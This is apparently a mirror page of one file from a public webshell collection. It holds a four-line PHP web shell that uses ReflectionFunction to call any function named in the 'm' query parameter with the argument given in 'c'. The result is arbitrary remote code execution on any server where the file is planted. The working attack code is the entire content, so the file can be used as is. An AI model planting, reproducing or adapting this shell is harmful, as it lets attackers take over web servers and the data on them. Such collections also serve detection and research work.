mirror of
https://github.com/tennc/webshell
synced 2024-11-22 19:23:05 +00:00
281 B
281 B
code:
<?php
$func = new ReflectionFunction($_GET[m]);
echo $func->invokeArgs(array($_GET[c]));
?>